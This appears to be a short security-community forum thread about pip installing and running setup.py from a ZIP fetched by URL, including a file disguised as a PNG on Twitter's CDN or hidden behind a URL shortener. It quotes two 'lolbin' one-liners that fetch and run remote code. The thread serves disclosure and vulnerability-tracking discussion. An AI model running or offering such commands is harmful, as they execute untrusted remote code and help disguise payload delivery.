Global Security Database

 View Only
  • 1.  Security Glitch: Python pip problems

    Posted Oct 27, 2022 11:00:00 AM
    https://twitter.com/david3141593/status/1584462389977939968?s=43&t=CEmtkaMrle2hJwbdOXjMzw

    TIL python's pip will execute a setup .py directly from a ZIP archive from a web URL, with mime sniffing. This allows for a nice lolbin oneliner, with payload hosted on Twitter's CDN (or anywhere else really) pip install "https://pbs"."twimg"."com/media/Ff0iwcvXEAAQDZ3.png"

    https://twitter.com/David3141593/status/1584505603799408640

    It also follows redirects, so you can use a URL shortener too!
    pip install https://t"."co/uPXauf8eTg


    ------------------------------
    Kurt Seifried
    Chief Blockchain Officer and Director of Special Projects
    Cloud Security Alliance
    [email protected]
    ------------------------------


  • 2.  RE: Security Glitch: Python pip problems

    Posted Oct 27, 2022 11:02:00 AM
    I don't think these are vulnerabilities per se, but they are definitely sharp edges that clearly most people don't know about. One thought: if there's an "informational" entry, e.g. "python pip will install software, as expected, but can also do so directly from arbitrary URL's"

    ------------------------------
    Kurt Seifried
    Chief Blockchain Officer and Director of Special Projects
    Cloud Security Alliance
    [email protected]
    ------------------------------